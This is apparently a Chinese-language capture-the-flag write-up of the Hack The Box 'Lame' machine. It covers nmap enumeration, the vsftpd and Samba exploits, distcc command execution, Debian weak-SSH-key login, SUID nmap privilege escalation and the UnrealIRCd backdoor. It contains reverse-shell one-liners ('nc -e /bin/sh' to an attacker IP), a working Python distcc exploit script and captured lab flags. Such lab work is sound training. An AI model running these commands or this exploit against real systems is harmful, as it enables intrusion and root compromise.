0xdf hacks stuff
这个有个什么 Guided Mode,好像是有流程的,学习下思路。 这次复现了两条线路。
FTP + SMB Task 1 How many of the nmap top 1000 TCP ports are open on the remote host?
nmap 不指定时默认就是 top 1000 端口。或者可以使用--top-ports X
来指定
Task 2 What version of VSFTPd is running on Lame?
需要使用 nmap 扫描详细信息:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 nmap -Pn -sVC -p21,22,139,445 -oN namp.txt 10.10.10.3 PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 2.3.4 | ftp-syst: | STAT: | FTP server status: | Connected to 10.10.14.47 | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | vsFTPd 2.3.4 - secure, fast, stable |_End of status |_ftp-anon: Anonymous FTP login allowed (FTP code 230) 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0) | ssh-hostkey: | 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA) |_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA) 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP) Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Host script results: |_clock-skew: mean: 1h51m54s, deviation: 2h49m45s, median: -8m08s | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb-os-discovery: | OS: Unix (Samba 3.0.20-Debian) | Computer name: lame | NetBIOS computer name: | Domain name: hackthebox.gr | FQDN: lame.hackthebox.gr |_ System time: 2024-08-07T02:42:47-04:00 |_smb2-time: Protocol negotiation failed (SMB2)
这里-Pn 就是表示在扫描时假定所有主机都是在线的,跳过主机发现阶段。这在某些情况下可以加快扫描速度,但可能会导致对某些实际不在线的主机产生误判。-s
表示执行端口扫描,V
表示获取服务版本信息,C
表示使用默认的脚本进行扫描。 根据信息可以知道 vsftp 版本2.3.4
Task 3 There is a famous backdoor in VSFTPd version 2.3.4, and a Metasploit module to exploit it. Does that exploit work here?
用 msf 搜索下版本漏洞:
1 2 use 0 # 选择下 show options # 查看所有需要配置的参数
按照要求设置下目标:
1 2 set rhosts 10.10.10.3 run
没法利用。
Task 4 What version of Samba is running on Lame? Give the numbers up to but not including “-Debian”.
刚才已经 Task2 已经出来了 3.0.20
Task 5 What 2007 CVE allows for remote code execution in this version of Samba via shell metacharacters involving the SamrChangePassword function when the “username map script” option is enabled in smb.conf?
1 2 search Samba 3.0.20 info 0
Task 6 Exploiting CVE-2007-2447 returns a shell as which user?
这里只是反弹的 shell,没法加固,而且是/bin/sh
,给他切换到/bin/bash
。
1 2 which python python -c "import pty;pty.spawn('/bin/bash')"
USER & ROOT(Task 7 8) /home/makis
的 flag:8ad91010428cb97ef9a4a407ce120e3a
/~
的 rootflag:ec4867f5f710918dcb6072cd611f1feb
Task 9 HTB: Lame
We’ll explore a bit beyond just getting a root shell on the box. While the official writeup doesn’t cover this, you can look at 0xdf’s write-up for more details. With a root shell, we can look at why the VSFTPd exploit failed. Our initial nmap scan showed four open TCP ports. Running netstat -tnlp shows many more ports listening, including ones on 0.0.0.0 and the boxes external IP, so they should be accessible. What must be blocking connection to these ports?
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 netstat -tnlp Active Internet connections (only servers) Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name tcp 0 0 0.0.0.0:512 0.0.0.0:* LISTEN 5480/xinetd tcp 0 0 0.0.0.0:513 0.0.0.0:* LISTEN 5480/xinetd tcp 0 0 0.0.0.0:2049 0.0.0.0:* LISTEN - tcp 0 0 0.0.0.0:514 0.0.0.0:* LISTEN 5480/xinetd tcp 0 0 0.0.0.0:59523 0.0.0.0:* LISTEN 5373/rpc.mountd tcp 0 0 0.0.0.0:8009 0.0.0.0:* LISTEN 5581/jsvc tcp 0 0 0.0.0.0:6697 0.0.0.0:* LISTEN 5643/unrealircd tcp 0 0 0.0.0.0:3306 0.0.0.0:* LISTEN 5168/mysqld tcp 0 0 0.0.0.0:42570 0.0.0.0:* LISTEN 4641/rpc.statd tcp 0 0 0.0.0.0:1099 0.0.0.0:* LISTEN 5622/rmiregistry tcp 0 0 0.0.0.0:6667 0.0.0.0:* LISTEN 5643/unrealircd tcp 0 0 0.0.0.0:139 0.0.0.0:* LISTEN 5451/smbd tcp 0 0 0.0.0.0:5900 0.0.0.0:* LISTEN 5642/Xtightvnc tcp 0 0 0.0.0.0:53454 0.0.0.0:* LISTEN - tcp 0 0 0.0.0.0:111 0.0.0.0:* LISTEN 4623/portmap tcp 0 0 0.0.0.0:6000 0.0.0.0:* LISTEN 5642/Xtightvnc tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN 5601/apache2 tcp 0 0 0.0.0.0:41235 0.0.0.0:* LISTEN 5622/rmiregistry tcp 0 0 0.0.0.0:8787 0.0.0.0:* LISTEN 5626/ruby tcp 0 0 0.0.0.0:8180 0.0.0.0:* LISTEN 5581/jsvc tcp 0 0 0.0.0.0:1524 0.0.0.0:* LISTEN 5480/xinetd tcp 0 0 0.0.0.0:21 0.0.0.0:* LISTEN 5480/xinetd tcp 0 0 10.10.10.3:53 0.0.0.0:* LISTEN 5021/named tcp 0 0 127.0.0.1:53 0.0.0.0:* LISTEN 5021/named tcp 0 0 0.0.0.0:23 0.0.0.0:* LISTEN 5480/xinetd tcp 0 0 0.0.0.0:5432 0.0.0.0:* LISTEN 5250/postgres tcp 0 0 0.0.0.0:25 0.0.0.0:* LISTEN 5441/master tcp 0 0 127.0.0.1:953 0.0.0.0:* LISTEN 5021/named tcp 0 0 0.0.0.0:445 0.0.0.0:* LISTEN 5451/smbd tcp6 0 0 :::2121 :::* LISTEN 5519/proftpd: (acce tcp6 0 0 :::3632 :::* LISTEN 5305/distccd tcp6 0 0 :::53 :::* LISTEN 5021/named tcp6 0 0 :::22 :::* LISTEN 5045/sshd tcp6 0 0 :::5432 :::* LISTEN 5250/postgres tcp6 0 0 ::1:953 :::* LISTEN 5021/named
如果链接成功。会从 6200 连接,可能是防火墙没有开放 6200 端口。 比如测试一下:
1 2 su - makis -c bash # 切换至makis nc 127.0.0.1 6200
firewall
Task 10 When the VSFTPd backdoor is trigger, what port starts listening?
6200
Task 11 When the VSFTPd backdoor is triggered, does port 6200 start listening on Lame?
yes 经过复现发现,虽然远程显示没有操作,但是如果再本地 nc 接口的话,是可以接到 root 的 shell。也就是说只是因为防火墙的问题 6200 没有映射到 0.0.0.0
,但是是可以打的。
distcc + Privesc HTB: More Lame
distcc 3632 这个打法不一定都能打到,我打完后面又测试别的的时候又打不了了。
如果正常扫描是扫不到 distcc 服务的。 nmap 也有扫描脚本,但是它不是默认的扫描脚本,我们可以保存到本地。
1 2 # 寻找默认保存地址。 locate *.nse | head
也就是保存到/usr/share/nmap/scripts/
1 wget https://svn.nmap.org/nmap/scripts/distcc-cve2004-2687.nse -O /usr/share/nmap/scripts/distcc-exec.nse
现在我们再用 nmap 顶点扫描就可以了:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 nmap -p 3632 10.10.10.3 --script distcc-exec --script-args="distcc-exec.cmd='id'" PORT STATE SERVICE 3632/tcp open distccd | distcc-exec: | VULNERABLE: | distcc Daemon Command Execution | State: VULNERABLE (Exploitable) | IDs: CVE:CVE-2004-2687 | Risk factor: High CVSSv2: 9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C) | Allows executing of arbitrary commands on systems running distccd 3.1 and | earlier. The vulnerability is the consequence of weak service configuration. | | Disclosure date: 2002-02-01 | Extra information: | | uid=1(daemon) gid=1(daemon) groups=1(daemon) | | References: | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2687 | https://distcc.github.io/security.html |_ https://nvd.nist.gov/vuln/detail/CVE-2004-2687
这里已经执行了 id 这个命令,并将结果返回回来。 我们反弹 shell。
1 nmap -p 3632 10.10.10.3 --script distcc-exec --script-args="distcc-exec.cmd='nc -e /bin/sh 10.10.14.47 7777'"
可以得到 shell。 加固下 shell:
1 2 which python python -c "import pty;pty.spawn('/bin/bash')"
我们能注意到在这个权限下我们是读取不到 root.txt
文件。 查看公钥文件。
1 2 cat /root/.ssh/authorized_keys ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w== msfadmin@metasploitable
为什么这个用户是msfadmin@metasploitable
。
Root SSH 弱密钥 GitHub - g0tmi1k/debian-ssh: Debian OpenSSL Predictable PRNG (CVE-2008-0166)
存档到本地。
1 git clone https://github.com/g0tmi1k/debian-ssh
440M,建议开个加速。
1 2 cd debian-ssh/common_keys tar jxf debian_ssh_rsa_2048_x86.tar.bz2
递归找一下带有公钥的文件名:
1 2 grep -lr AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w== *.pub 57c3115d77c56390332dc5c49978627a-5429.pub
-l
选项表示只输出匹配的文件名,而不是匹配的行内容。-r
选项表示递归地在目录及其子目录中搜索。 然后用找到的私钥连接:
1 ssh -i 57c3115d77c56390332dc5c49978627a-5429.pub root@10.10.10.3
这里我报了一个错:
Unable to negotiate with 10.10.10.3 port 22: no matching host key type found. Their offer: ssh-rsa,ssh-dss
解决也很简单,在你的~/.ssh/config
文件中添加下面的内容就行:
1 2 3 Host 10.10.10.3 HostKeyAlgorithms +ssh-rsa PubkeyAcceptedKeyTypes +ssh-rsa
然后就可以连上了。
SUID nmap 查找 suid 文件:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 find / -type f -user root \( -perm -4000 -o -perm -2000 \) 2>/dev/null -ls /dev/null -lsf -user root \( -perm -4000 -o -perm -2000 \) 2> 16466 68 -rwsr-xr-x 1 root root 63584 Apr 14 2008 /bin/umount 16449 20 -rwsr-xr-- 1 root fuse 20056 Feb 26 2008 /bin/fusermount 16398 28 -rwsr-xr-x 1 root root 25540 Apr 2 2008 /bin/su 16418 84 -rwsr-xr-x 1 root root 81368 Apr 14 2008 /bin/mount 16427 32 -rwsr-xr-x 1 root root 30856 Dec 10 2007 /bin/ping 16457 28 -rwsr-xr-x 1 root root 26684 Dec 10 2007 /bin/ping6 8370 68 -rwsr-xr-x 1 root root 65520 Dec 2 2008 /sbin/mount.nfs 8252 20 -rwxr-sr-x 1 root shadow 19584 Apr 9 2008 /sbin/unix_chkpwd 304747 4 -rwsr-xr-- 1 root dhcp 2960 Apr 2 2008 /lib/dhcp3-client/call-dhclient-script 344359 112 -rwsr-xr-x 2 root root 107776 Feb 25 2008 /usr/bin/sudoedit 345080 4 -rwxr-sr-x 1 root utmp 3192 Apr 22 2008 /usr/bin/Eterm 344440 8 -rwsr-sr-x 1 root root 7460 Jun 25 2008 /usr/bin/X 344089 8 -rwxr-sr-x 1 root tty 8192 Dec 12 2007 /usr/bin/bsd-write 344958 12 -rwsr-xr-x 1 root root 8524 Nov 22 2007 /usr/bin/netkit-rsh 344366 80 -rwxr-sr-x 1 root ssh 76580 Apr 6 2008 /usr/bin/ssh-agent 344139 40 -rwsr-xr-x 1 root root 37360 Apr 2 2008 /usr/bin/gpasswd 344689 32 -rwxr-sr-x 1 root mlocate 30508 Mar 8 2008 /usr/bin/mlocate 344364 28 -rwxr-sr-x 1 root crontab 26928 Apr 8 2008 /usr/bin/crontab 344317 16 -rwsr-xr-x 1 root root 12296 Dec 10 2007 /usr/bin/traceroute6.iputils 344359 112 -rwsr-xr-x 2 root root 107776 Feb 25 2008 /usr/bin/sudo 344959 12 -rwsr-xr-x 1 root root 12020 Nov 22 2007 /usr/bin/netkit-rlogin 344550 40 -rwxr-sr-x 1 root shadow 37904 Apr 2 2008 /usr/bin/chage 344284 308 -rwxr-sr-x 1 root utmp 308228 Oct 23 2007 /usr/bin/screen 344220 20 -rwxr-sr-x 1 root shadow 16424 Apr 2 2008 /usr/bin/expiry 344230 12 -rwsr-xr-x 1 root root 11048 Dec 10 2007 /usr/bin/arping 345067 304 -rwxr-sr-x 1 root utmp 306996 Jan 2 2009 /usr/bin/xterm 344365 20 -rwsr-xr-x 1 root root 19144 Apr 2 2008 /usr/bin/newgrp 344337 12 -rwxr-sr-x 1 root tty 9960 Apr 14 2008 /usr/bin/wall 344429 28 -rwsr-xr-x 1 root root 28624 Apr 2 2008 /usr/bin/chfn 344956 768 -rwsr-xr-x 1 root root 780676 Apr 8 2008 /usr/bin/nmap 344441 24 -rwsr-xr-x 1 root root 23952 Apr 2 2008 /usr/bin/chsh 344957 16 -rwsr-xr-x 1 root root 15952 Nov 22 2007 /usr/bin/netkit-rcp 344771 32 -rwsr-xr-x 1 root root 29104 Apr 2 2008 /usr/bin/passwd 344792 48 -rwsr-xr-x 1 root root 46084 Mar 31 2008 /usr/bin/mtr 354594 12 -r-xr-sr-x 1 root postdrop 10312 Apr 18 2008 /usr/sbin/postqueue 354659 12 -r-xr-sr-x 1 root postdrop 10036 Apr 18 2008 /usr/sbin/postdrop 354626 268 -rwsr-xr-- 1 root dip 269256 Oct 4 2007 /usr/sbin/pppd 369987 8 -rwsr-xr-- 1 root telnetd 6040 Dec 17 2006 /usr/lib/telnetlogin 385106 12 -rwsr-xr-- 1 root www-data 10276 Mar 9 2010 /usr/lib/apache2/suexec 386116 8 -rwsr-xr-x 1 root root 4524 Nov 5 2007 /usr/lib/eject/dmcrypt-get-device 377149 168 -rwsr-xr-x 1 root root 165748 Apr 6 2008 /usr/lib/openssh/ssh-keysign 371390 12 -rwsr-xr-x 1 root root 9624 Aug 17 2009 /usr/lib/pt_chown 8415 16 -r-sr-xr-x 1 root root 14320 Nov 3 2020 /usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper 16687 12 -r-sr-xr-x 1 root root 9532 Nov 3 2020 /usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
我们能注意到 32 行有一个 nmap。 去 GTFOBIN 搜索下:
https://gtfobins.github.io/#nmap
我们直接使用第二个:
1 2 nmap --interactive nmap> !sh
uid=1(daemon) 表示用户 ID(User ID)为 1,对应的用户名是 daemon。用户 ID 用于在系统中唯一标识一个用户。 gid=1(daemon) 表示组 ID(Group ID)为 1,对应的组名是 daemon。组 ID 用于标识用户所属的组。 euid=0(root) 表示有效用户 ID(Effective User ID)为 0,对应的用户名是 root。有效用户 ID 决定了进程在执行某些操作时所具有的权限。在这种情况下,进程具有 root 用户的权限。 groups=1(daemon) 表示该用户所属的组,这里只显示了一个组,即组 ID 为 1 的 daemon 组。 这就获得了 root
的权限。
UnrealIRCd 查看监听服务。这里的 6697 端 IRC。
1 2 3 4 netstat -tnlp | grep 6697 (Not all processes could be identified, non-owned process info will not be shown, you would have to be root to see it all.) tcp 0 0 0.0.0.0:6697 0.0.0.0:* LISTEN -
查看进程,这里unrealircd
用 root 权限运行。
1 2 3 ps auxww | grep unrealircd root 5643 0.0 0.4 8540 2360 ? S Aug06 0:02 /usr/bin/unrealircd daemon 10501 0.0 0.1 3004 752 pts/6 R+ 06:27 0:00 grep unrealircd
nc 尝试监听这个端口:输出被标识为 Metasploitable
(这么神奇?)
1 2 3 4 5 daemon@lame:/root$ nc 127.0.0.1 6697 nc 127.0.0.1 6697 :irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname... :irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead ERROR :Closing Link: [127.0.0.1] (Ping timeout)
HTB: Irked
1 echo "AB; nc -e /bin/sh 10.10.14.47 443" | nc 127.0.0.1 6697
我去好神奇。
distcc 漏洞利用 这里由于靶机无法使用 distcc 这个端口,这里暂时不做过多分析了。 通过 wireshark 将 distcc 的 nmap 脚本包抓包,可以做出 PoC 可以通过 nc 来实现字节对接。
1 2 3 4 root@kali DIST00000001ARGC00000008ARGV00000002shARGV00000002-cARGV0000000csh -c '(id)' ARGV00000001 DONE00000001STAT00000000SERR00000000SOUT0000002duid=1 (daemon) gid=1 (daemon) groups=1 (daemon) DOTO00000000Ncat: Connection reset by peer.
Py:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 import socketimport sysif len (sys.argv) != 4 : print (f"{sys.argv[0 ]} [ip] [port] [command]" ) sys.exit(1 ) _, ip, port, cmd = sys.argv mask = "0xdffdx0" s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((ip, int (port))) full_cmd = f"sh -c '(echo -n {mask} ;{cmd} ;echo -n {mask} )'" payload = f"""DIST00000001ARGC00000008ARGV00000002shARGV00000002-cARGV{len (full_cmd):8x} {full_cmd} ARGV00000001#ARGV00000002-cARGV00000006main.cARGV00000002- oARGV00000006main.oDOTI00000001A""" s.send(payload.encode()) resp = s.recv(4096 ) print (resp.decode(errors="ignore" ).split(mask)[1 ].strip())